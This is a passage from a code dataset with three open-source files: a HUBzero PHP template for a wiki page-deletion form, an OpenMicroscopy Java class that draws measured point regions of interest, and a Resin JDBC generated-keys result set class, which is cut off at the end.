code stringlengths 3 1.05M | repo_name stringlengths 4 116 | path stringlengths 4 991 | language stringclasses 9 values | license stringclasses 15 values | size int32 3 1.05M |
|---|---|---|---|---|---|
<?php
/**
* HUBzero CMS
*
* Copyright 2005-2015 HUBzero Foundation, LLC.
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*
* HUBzero is a registered trademark of Purdue University.
*
* @package hubzero-cms
* @copyright Copyright 2005-2015 HUBzero Foundation, LLC.
* @license http://opensource.org/licenses/MIT MIT
*/
// No direct access.
defined('_HZEXEC_') or die();
// Attach the component stylesheet only when this view is rendered
// stand-alone; a sub-view relies on the parent view having loaded assets.
if (!$this->sub)
{
$this->css();
}
?>
<header id="<?php echo ($this->sub) ? 'sub-content-header' : 'content-header'; ?>">
<?php if (count($this->parents)) { ?>
<p class="wiki-crumbs">
<?php foreach ($this->parents as $parent) { ?>
<a class="wiki-crumb" href="<?php echo Route::url($parent->link()); ?>"><?php echo $parent->title; ?></a> /
<?php } ?>
</p>
<?php } ?>
<h2><?php echo $this->escape($this->page->title); ?></h2>
<?php
// The authors sub-view is only rendered for non-static pages.
if (!$this->page->isStatic())
{
$this->view('authors', 'pages')
//->setBasePath($this->base_path)
->set('page', $this->page)
->display();
}
?>
</header><!-- /#content-header -->
<?php if ($this->getError()) { ?>
<p class="error"><?php echo $this->getError(); ?></p>
<?php } ?>
<?php
// Shared submenu for the wiki page views; pass through the routing and
// task context so its links target the right controller/task.
$this->view('submenu', 'pages')
//->setBasePath($this->base_path)
->set('option', $this->option)
->set('controller', $this->controller)
->set('page', $this->page)
->set('task', $this->task)
->set('sub', $this->sub)
->display();
?>
<section class="main section">
<?php if ($this->page->isLocked() && !$this->page->access('manage')) { ?>
<p class="warning"><?php echo Lang::txt('COM_WIKI_WARNING_NOT_AUTH_EDITOR'); ?></p>
<?php } else { ?>
<form action="<?php echo Route::url($this->page->link('base')); ?>" method="post" id="hubForm">
<div class="explaination">
<p><?php echo Lang::txt('COM_WIKI_DELETE_PAGE_EXPLANATION'); ?></p>
</div>
<fieldset>
<legend><?php echo Lang::txt('COM_WIKI_DELETE_PAGE'); ?></legend>
<label for="confirm-delete">
<input class="option" type="checkbox" name="confirm" id="confirm-delete" value="1" />
<?php echo Lang::txt('COM_WIKI_FIELD_CONFIRM_DELETE'); ?>
</label>
<p class="warning">
<?php echo Lang::txt('COM_WIKI_FIELD_CONFIRM_DELETE_HINT'); ?>
</p>
<input type="hidden" name="pagename" value="<?php echo $this->escape(($this->page->get('path') ? $this->page->get('path') . '/' : '') . $this->page->get('pagename')); ?>" />
<input type="hidden" name="page_id" value="<?php echo $this->escape($this->page->get('id')); ?>" />
<?php foreach ($this->page->adapter()->routing('delete') as $name => $val) { ?>
<input type="hidden" name="<?php echo $this->escape($name); ?>" value="<?php echo $this->escape($val); ?>" />
<?php } ?>
<?php echo Html::input('token'); ?>
</fieldset><div class="clear"></div>
<p class="submit">
<input type="submit" class="btn btn-danger" value="<?php echo Lang::txt('COM_WIKI_DELETE'); ?>" />
</p>
</form>
<?php } ?>
</section><!-- / .main section -->
| drewthoennes/hubzero-cms | core/components/com_wiki/site/views/pages/tmpl/delete.php | PHP | gpl-2.0 | 3,987 |
/*
 * org.openmicroscopy.shoola.util.roi.figures.MeasurePointFigure
*
*------------------------------------------------------------------------------
* Copyright (C) 2006-2013 University of Dundee. All rights reserved.
*
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License along
* with this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
*
*------------------------------------------------------------------------------
*/
package org.openmicroscopy.shoola.util.roi.figures;
//Java imports
import java.awt.Font;
import java.awt.Graphics2D;
import java.awt.Point;
import java.awt.geom.AffineTransform;
import java.awt.geom.Point2D;
import java.awt.geom.Rectangle2D;
import java.text.DecimalFormat;
import java.text.NumberFormat;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
//Third-party libraries
import org.jhotdraw.draw.AbstractAttributedFigure;
import org.jhotdraw.draw.FigureListener;
//Application-internal dependencies
import org.openmicroscopy.shoola.util.roi.model.annotation.AnnotationKeys;
import org.openmicroscopy.shoola.util.roi.model.annotation.MeasurementAttributes;
import org.openmicroscopy.shoola.util.roi.figures.ROIFigure;
import org.openmicroscopy.shoola.util.roi.model.ROI;
import org.openmicroscopy.shoola.util.roi.model.ROIShape;
import org.openmicroscopy.shoola.util.roi.model.util.MeasurementUnits;
import org.openmicroscopy.shoola.util.ui.UIUtilities;
import org.openmicroscopy.shoola.util.ui.UnitsObject;
import org.openmicroscopy.shoola.util.ui.drawingtools.figures.FigureUtil;
import org.openmicroscopy.shoola.util.ui.drawingtools.figures.PointTextFigure;
/**
* Point with measurement.
*
* @author Jean-Marie Burel
* <a href="mailto:j.burel@dundee.ac.uk">j.burel@dundee.ac.uk</a>
* @author Donald MacDonald
* <a href="mailto:donald@lifesci.dundee.ac.uk">donald@lifesci.dundee.ac.uk</a>
* @version 3.0
* @since OME3.0
*/
public class MeasurePointFigure
extends PointTextFigure
implements ROIFigure
{
/** Flag indicating the figure can/cannot be deleted.*/
private boolean deletable;
/** Flag indicating the figure can/cannot be annotated.*/
private boolean annotatable;
/** Flag indicating the figure can/cannot be edited.*/
private boolean editable;
/** Is this figure read only. */
private boolean readOnly;
/** Is this figure a client object. */
private boolean clientObject;
/** has the figure been modified. */
private boolean dirty;
/**
* This is used to perform faster drawing and hit testing.
*/
private Rectangle2D bounds;
/** The ROI containing the ROIFigure which in turn contains this Figure. */
protected ROI roi;
/** The ROIFigure contains this Figure. */
protected ROIShape shape;
/** The Measurement units, and values of the image. */
private MeasurementUnits units;
/**
* The status of the figure i.e. {@link ROIFigure#IDLE} or
* {@link ROIFigure#MOVING}.
*/
private int status;
/** Flag indicating if the user can move or resize the shape.*/
private boolean interactable;
/** The units of reference.*/
private String refUnits;
/**
 * Creates a new instance.
 *
 * @param text text of the figure.
 * @param x coordinate of the figure.
 * @param y coordinate of the figure.
 * @param width of the figure.
 * @param height of the figure.
 * @param readOnly The figure is read only.
 * @param clientObject The figure is created client-side.
 * @param editable Flag indicating the figure can/cannot be edited.
 * @param deletable Flag indicating the figure can/cannot be deleted.
 * @param annotatable Flag indicating the figure can/cannot be annotated.
 */
public MeasurePointFigure(String text, double x, double y, double width,
double height, boolean readOnly, boolean clientObject,
boolean editable, boolean deletable, boolean annotatable)
{
super(text, x, y, width, height);
setAttributeEnabled(MeasurementAttributes.TEXT_COLOR, true);
setAttribute(MeasurementAttributes.FONT_FACE, DEFAULT_FONT);
// Double.valueOf replaces the deprecated new Double(...) constructor and
// allows the boxed value to be cached by the runtime.
setAttribute(MeasurementAttributes.FONT_SIZE, Double.valueOf(FONT_SIZE));
shape = null;
roi = null;
status = IDLE;
setReadOnly(readOnly);
setClientObject(clientObject);
this.deletable = deletable;
this.annotatable = annotatable;
this.editable = editable;
interactable = true;
refUnits = UnitsObject.MICRONS;
}
/**
 * Creates a new instance with default flags: not read-only, client-side,
 * editable, deletable and annotatable.
 *
 * @param x coordinate of the figure.
 * @param y coordinate of the figure.
 * @param width of the figure.
 * @param height of the figure.
 */
public MeasurePointFigure(double x, double y, double width, double height)
{
this(DEFAULT_TEXT, x, y, width, height, false, true, true, true, true);
}
/**
 * Create an instance of the Point Figure located at the origin with zero
 * size and the default text.
 * @param readOnly The figure is read only.
 * @param clientObject The figure is created client-side.
 * @param editable Flag indicating the figure can/cannot be edited.
 * @param deletable Flag indicating the figure can/cannot be deleted.
 * @param annotatable Flag indicating the figure can/cannot be annotated.
 */
public MeasurePointFigure(boolean readOnly, boolean clientObject,
boolean editable, boolean deletable, boolean annotatable)
{
this(DEFAULT_TEXT, 0, 0, 0, 0, readOnly, clientObject, editable,
deletable, annotatable);
}
/**
 * Create an instance of the Point Figure at the origin, zero-sized,
 * with default flags.
 */
public MeasurePointFigure()
{
this(0, 0, 0, 0);
}
/**
 * Get the X coordinate of the figure, converted to the reference units
 * when the measurement units are in microns.
 *
 * @return see above.
 */
public double getMeasurementX()
{
	if (!units.isInMicrons()) return getX();
	return UIUtilities.transformSize(getX()*units.getMicronsPixelX()).getValue();
}
/**
 * Get the centre of the figure, converted to the reference units when the
 * measurement units are in microns.
 *
 * @return see above.
 */
public Point2D getMeasurementCentre()
{
	Point2D centre = getCentre();
	if (!units.isInMicrons()) return centre;
	double cx = UIUtilities.transformSize(
			centre.getX()*units.getMicronsPixelX()).getValue();
	double cy = UIUtilities.transformSize(
			centre.getY()*units.getMicronsPixelY()).getValue();
	return new Point2D.Double(cx, cy);
}
/**
 * Get the Y coordinate of the figure, converted to the reference units
 * when the measurement units are in microns.
 *
 * @return see above.
 */
public double getMeasurementY()
{
	if (!units.isInMicrons()) return getY();
	return UIUtilities.transformSize(getY()*units.getMicronsPixelY()).getValue();
}
/**
 * Get the width of the figure, converted to the reference units when the
 * measurement units are in microns.
 *
 * @return see above.
 */
public double getMeasurementWidth()
{
	if (!units.isInMicrons()) return getWidth();
	return UIUtilities.transformSize(getWidth()*units.getMicronsPixelX()).getValue();
}
/**
 * Get the height of the figure, converted to the reference units when the
 * measurement units are in microns.
 *
 * @return see above.
 */
public double getMeasurementHeight()
{
	if (!units.isInMicrons()) return getHeight();
	return UIUtilities.transformSize(getHeight()*units.getMicronsPixelY()).getValue();
}
/**
 * Get the x coordinate of the figure.
 * Delegates to the inherited <code>ellipse</code> geometry that backs
 * this point figure.
 * @return see above.
 */
public double getX() { return ellipse.getX(); }
/**
 * Get the y coordinate of the figure.
 * @return see above.
 */
public double getY() { return ellipse.getY(); }
/**
 * Get the width of the figure's backing geometry.
 * @return see above.
 */
public double getWidth() { return ellipse.getWidth(); }
/**
 * Get the height of the figure's backing geometry.
 * @return see above.
 */
public double getHeight() { return ellipse.getHeight(); }
/**
 * Draw the figure on the graphics context.
 *
 * When the measurement text or the ROI id is shown, the rendered text
 * bounds are cached in the <code>bounds</code> field so that
 * <code>getDrawingArea()</code> can grow the repaint region accordingly.
 *
 * @param g the graphics context.
 */
public void draw(Graphics2D g)
{
super.draw(g);
if(MeasurementAttributes.SHOWMEASUREMENT.get(this) ||
MeasurementAttributes.SHOWID.get(this))
{
// Format the (possibly micron-converted) centre as "(x,y)".
NumberFormat formatter = new DecimalFormat(FORMAT_PATTERN);
String pointCentre =
"("+formatter.format(getMeasurementCentre().getX())
+ ","+formatter.format(getMeasurementCentre().getY())+")";
double sz = ((Double) this.getAttribute(
MeasurementAttributes.FONT_SIZE));
g.setFont(new Font(FONT_FAMILY, FONT_STYLE, (int) sz));
// Centre the text horizontally below the figure; store in the field.
bounds = g.getFontMetrics().getStringBounds(pointCentre, g);
bounds = new Rectangle2D.Double(
this.getBounds().getCenterX()-bounds.getWidth()/2,
this.getBounds().getCenterY()+bounds.getHeight()/2,
bounds.getWidth(), bounds.getHeight());
if (MeasurementAttributes.SHOWMEASUREMENT.get(this))
{
g.setColor(MeasurementAttributes.MEASUREMENTTEXT_COLOUR.get(this));
g.drawString(pointCentre, (int) bounds.getX(),
(int) bounds.getY());
}
if (MeasurementAttributes.SHOWID.get(this))
{
// This local deliberately shadows the field so the cached
// measurement-text bounds are not overwritten by the id text bounds.
Rectangle2D bounds;
bounds = g.getFontMetrics().getStringBounds(getROI().getID()+"", g);
bounds = new Rectangle2D.Double(
getBounds().getCenterX()-bounds.getWidth()/2,
getBounds().getCenterY()+bounds.getHeight()/2,
bounds.getWidth(), bounds.getHeight());
g.setColor(this.getTextColor());
g.drawString(getROI().getID()+"", (int) bounds.getX(),
(int) bounds.getY());
}
}
}
/**
 * Overridden to stop updating the shape when the figure is read-only or
 * not interactable.
 * @see AbstractAttributedFigure#transform(AffineTransform)
 */
public void transform(AffineTransform tx)
{
	if (readOnly || !interactable) return;
	super.transform(tx);
	setObjectDirty(true);
}
/**
 * Overridden to stop updating the shape when the figure is read-only or
 * not interactable.
 * @see AbstractAttributedFigure#setBounds(Double, Double)
 */
public void setBounds(Point2D.Double anchor, Point2D.Double lead)
{
	if (readOnly || !interactable) return;
	super.setBounds(anchor, lead);
	setObjectDirty(true);
}
/**
 * Calculates the bounds of the rendered figure, including the text
 * rendered by {@link #draw(Graphics2D)} (cached in the
 * <code>bounds</code> field).
 *
 * @return see above.
 */
public Rectangle2D.Double getDrawingArea()
{
Rectangle2D.Double newBounds = super.getDrawingArea();
if (bounds != null)
{
// Grow left/top edges to include the text bounds.
if (newBounds.getX() > bounds.getX())
{
double diff = newBounds.x-bounds.getX();
newBounds.x = bounds.getX();
newBounds.width = newBounds.width+diff;
}
if (newBounds.getY() > bounds.getY())
{
double diff = newBounds.y-bounds.getY();
newBounds.y = bounds.getY();
newBounds.height = newBounds.height+diff;
}
// Grow right/bottom edges. Bug fix: the original computed
// bounds.right - newBounds.x + newBounds.width (missing parentheses),
// which over-grew the drawing area; the two right (resp. bottom)
// edges must be compared.
if (bounds.getX()+bounds.getWidth() >
newBounds.getX()+newBounds.getWidth())
{
double diff = bounds.getX()+bounds.getWidth()
-(newBounds.getX()+newBounds.getWidth());
newBounds.width = newBounds.width+diff;
}
if (bounds.getY()+bounds.getHeight() >
newBounds.getY()+newBounds.getHeight())
{
double diff = bounds.getY()+bounds.getHeight()
-(newBounds.getY()+newBounds.getHeight());
newBounds.height = newBounds.height+diff;
}
}
return newBounds;
}
/**
 * Add units to the string.
 * NOTE(review): the squared symbol suggests this was copied from an
 * area-based figure -- confirm it is intended for a point figure.
 *
 * @param str see above.
 * @return returns the string with the units added.
 */
public String addUnits(String str)
{
	if (shape == null) return str;
	String unit = units.isInMicrons()
			? refUnits : UIUtilities.PIXELS_SYMBOL;
	return str + unit + UIUtilities.SQUARED_SYMBOL;
}
/**
 * Calculate the centre of the figure, rounded to the nearest pixel.
 * @return see above.
 */
public Point2D getCentre()
{
	double cx = Math.round(ellipse.getCenterX());
	double cy = Math.round(ellipse.getCenterY());
	return new Point2D.Double(cx, cy);
}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#getROI()
 */
public ROI getROI() { return roi; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#getROIShape()
 */
public ROIShape getROIShape() { return shape; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#setROI(ROI)
 */
public void setROI(ROI roi) { this.roi = roi; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#setROIShape(ROIShape)
 */
public void setROIShape(ROIShape shape) { this.shape = shape; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * Stores the (possibly micron-converted) centre coordinates on the shape.
 * @see ROIFigure#calculateMeasurements()
 */
public void calculateMeasurements()
{
if (shape == null) return;
AnnotationKeys.CENTREX.set(shape, getMeasurementCentre().getX());
AnnotationKeys.CENTREY.set(shape, getMeasurementCentre().getY());
}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#getType()
 */
public String getType() { return FigureUtil.POINT_TYPE; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * Also refreshes the cached reference units from the pixel size.
 * @see ROIFigure#setMeasurementUnits(MeasurementUnits)
 */
public void setMeasurementUnits(MeasurementUnits units)
{
this.units = units;
refUnits = UIUtilities.transformSize(
units.getMicronsPixelX()).getUnits();
}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * A point figure is represented by its single (truncated) centre pixel.
 * @see ROIFigure#getPoints()
 */
public List<Point> getPoints()
{
return Arrays.asList(new Point((int) ellipse.getCenterX(),
(int) ellipse.getCenterY()));
}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#getSize()
 */
public int getSize() { return 1; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#setStatus(int)
 */
public void setStatus(int status) { this.status = status; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#getStatus()
 */
public int getStatus() { return status; }
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * @see ROIFigure#isReadOnly()
 */
public boolean isReadOnly() { return readOnly;}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * Also flips the editable state (setEditable is presumably inherited
 * from the drawing framework -- TODO confirm).
 * @see ROIFigure#setReadOnly(boolean)
 */
public void setReadOnly(boolean readOnly)
{
this.readOnly = readOnly;
setEditable(!readOnly);
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#isClientObject()
 */
public boolean isClientObject()
{
return clientObject;
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#setClientObject(boolean)
 */
public void setClientObject(boolean clientSide)
{
clientObject = clientSide;
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#isDirty()
 */
public boolean isDirty()
{
return dirty;
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#setObjectDirty(boolean)
 */
public void setObjectDirty(boolean dirty)
{
this.dirty = dirty;
}
/**
 * Clones the figure. The copy is always marked dirty and interactable so
 * it can be edited independently of the original.
 * @see MeasurePointFigure#clone()
 */
public MeasurePointFigure clone()
{
MeasurePointFigure that = (MeasurePointFigure) super.clone();
that.setReadOnly(this.isReadOnly());
that.setClientObject(this.isClientObject());
that.setObjectDirty(true);
that.setInteractable(true);
return that;
}
/**
 * Marks the object as dirty whenever its text is modified.
 * @see MeasurePointFigure#setText(String)
 */
public void setText(String text)
{
super.setText(text);
this.setObjectDirty(true);
}
/**
 * Implemented as specified by the {@link ROIFigure} interface.
 * Returns a mutable snapshot of the registered figure listeners.
 * @see ROIFigure#getFigureListeners()
 */
public List<FigureListener> getFigureListeners()
{
// EventListenerList can filter entries by type directly; this replaces
// the manual walk over the raw (type, listener) pair array.
return new ArrayList<FigureListener>(
Arrays.asList(listenerList.getListeners(FigureListener.class)));
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#canAnnotate()
 */
public boolean canAnnotate() { return annotatable; }
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#canDelete()
 */
public boolean canDelete() { return deletable; }
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#canEdit()
 */
public boolean canEdit() { return editable; }
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#setInteractable(boolean)
 */
public void setInteractable(boolean interactable)
{
this.interactable = interactable;
}
/**
 * Implemented as specified by the {@link ROIFigure} interface
 * @see ROIFigure#canInteract()
 */
public boolean canInteract() { return interactable; }
} | jballanc/openmicroscopy | components/insight/SRC/org/openmicroscopy/shoola/util/roi/figures/MeasurePointFigure.java | Java | gpl-2.0 | 19,396 |
/*
* Copyright (c) 1998-2012 Caucho Technology -- all rights reserved
*
* This file is part of Resin(R) Open Source
*
* Each copy or derived work must preserve the copyright notice and this
* notice unmodified.
*
* Resin Open Source is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* Resin Open Source is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE, or any warranty
* of NON-INFRINGEMENT. See the GNU General Public License for more
* details.
*
* You should have received a copy of the GNU General Public License
* along with Resin Open Source; if not, write to the
* Free SoftwareFoundation, Inc.
* 59 Temple Place, Suite 330
* Boston, MA 02111-1307 USA
*
* @author Scott Ferguson
*/
package com.caucho.db.jdbc;
import com.caucho.db.sql.Data;
import com.caucho.db.table.Column;
import java.io.InputStream;
import java.io.Reader;
import java.sql.NClob;
import java.sql.RowId;
import java.sql.SQLException;
import java.sql.SQLXML;
import java.sql.Statement;
import java.util.ArrayList;
/**
* The JDBC statement implementation.
*/
public class GeneratedKeysResultSet extends AbstractResultSet {
private ArrayList<Data> _keys = new ArrayList<Data>();
private Statement _stmt;
private int _row;
/**
 * Initialize the keys result set at the beginning of the query.
 *
 * @param stmt the statement that produced the generated keys.
 */
public void init(Statement stmt)
{
_stmt = stmt;
_row = 0;
}
/**
 * Initialize the keys result set at the beginning of the query.
 * Resets the cursor so the single row of keys can be read again.
 */
public void init()
{
_row = 0;
}
/**
 * Returns the statement associated with the keys.
 */
@Override
public java.sql.Statement getStatement()
throws SQLException
{
return _stmt;
}
// NOTE(review): returns null, which technically violates the JDBC
// ResultSet contract -- confirm callers tolerate this.
@Override
public java.sql.ResultSetMetaData getMetaData()
throws SQLException
{
return null;
}
// The generated keys form a single logical row: next() succeeds once.
@Override
public boolean next()
throws SQLException
{
return _row++ == 0;
}
// Generated key values are never SQL NULL here.
@Override
public boolean wasNull()
throws SQLException
{
return false;
}
/**
 * Returns the index for the given column name.
 *
 * @param columnName the key column name to look up.
 * @return the 1-based column index.
 * @throws SQLException if no key column has the given name.
 */
@Override
public int findColumn(String columnName)
throws SQLException
{
for (int i = 0; i < _keys.size(); i++) {
Column column = _keys.get(i).getColumn();
if (column.getName().equals(columnName))
return i + 1;
}
// L is presumably an inherited L10N localization helper -- TODO confirm.
throw new SQLException(L.l("`{0}' is an unknown column.", columnName));
}
/**
 * Sets the specified column.
 *
 * @param index the 1-based column index.
 * @param column the column metadata to attach to that key slot.
 */
public void setColumn(int index, Column column)
{
Data data = addData(index);
data.setColumn(column);
}
/**
 * Returns the generated string key.
 *
 * @param columnIndex the 1-based column index.
 * @return the key value as a string.
 */
@Override
public String getString(int columnIndex)
  throws SQLException
{
  return _keys.get(columnIndex - 1).getString();
}
/**
 * Sets the generated string key.
 *
 * @param columnIndex the 1-based column index.
 * @param value the key value.
 */
public void setString(int columnIndex, String value)
  throws SQLException
{
  addData(columnIndex).setString(value);
}
/**
 * Returns the generated integer key.
 *
 * @param columnIndex the 1-based column index.
 * @return the key value as an int.
 */
@Override
public int getInt(int columnIndex)
  throws SQLException
{
  return _keys.get(columnIndex - 1).getInt();
}
/**
 * Sets the generated int key.
 *
 * @param columnIndex the 1-based column index.
 * @param value the key value.
 */
public void setInt(int columnIndex, int value)
  throws SQLException
{
  addData(columnIndex).setInt(value);
}
/**
 * Returns the generated long key.
 *
 * @param columnIndex the 1-based column index.
 * @return the key value as a long.
 */
@Override
public long getLong(int columnIndex)
  throws SQLException
{
  return _keys.get(columnIndex - 1).getLong();
}
/**
 * Sets the generated long key.
 *
 * @param columnIndex the 1-based column index.
 * @param value the key value.
 */
public void setLong(int columnIndex, long value)
  throws SQLException
{
  addData(columnIndex).setLong(value);
}
/**
 * Ensures the key list has at least columnIndex slots and returns the
 * slot for the given 1-based index.
 */
private Data addData(int columnIndex)
{
  while (_keys.size() < columnIndex)
    _keys.add(new Data());
  return _keys.get(columnIndex - 1);
}
/**
 * Releases the statement reference.
 */
public void close()
{
  _stmt = null;
}
// --- JDBC 3.0/4.0 additions below (RowId, NClob, SQLXML, stream/LOB
// updates, wrapper API) are not implemented for generated-key result
// sets: each method throws UnsupportedOperationException. ---
public RowId getRowId(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public RowId getRowId(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateRowId(int columnIndex, RowId x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateRowId(String columnLabel, RowId x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public int getHoldability() throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public boolean isClosed() throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNString(int columnIndex, String nString) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNString(String columnLabel, String nString) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, NClob nClob) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, NClob nClob) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public NClob getNClob(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public NClob getNClob(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public SQLXML getSQLXML(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public SQLXML getSQLXML(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateSQLXML(int columnIndex, SQLXML xmlObject) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateSQLXML(String columnLabel, SQLXML xmlObject) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public String getNString(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public String getNString(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public Reader getNCharacterStream(int columnIndex) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public Reader getNCharacterStream(String columnLabel) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(int columnIndex, Reader x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(int columnIndex, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(int columnIndex, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(int columnIndex, Reader x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(String columnLabel, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(String columnLabel, InputStream x, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(int columnIndex, InputStream inputStream, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(String columnLabel, InputStream inputStream, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(int columnIndex, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, Reader reader, long length) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(int columnIndex, Reader x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNCharacterStream(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(int columnIndex, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(int columnIndex, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(int columnIndex, Reader x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateAsciiStream(String columnLabel, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBinaryStream(String columnLabel, InputStream x) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateCharacterStream(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(int columnIndex, InputStream inputStream) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateBlob(String columnLabel, InputStream inputStream) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(int columnIndex, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateClob(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(int columnIndex, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public void updateNClob(String columnLabel, Reader reader) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public <T> T unwrap(Class<T> iface) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
public boolean isWrapperFor(Class<?> iface) throws SQLException {
throw new UnsupportedOperationException("Not supported yet.");
}
// Debug representation: simple class name plus the current key list.
@Override
public String toString()
{
return getClass().getSimpleName() + _keys;
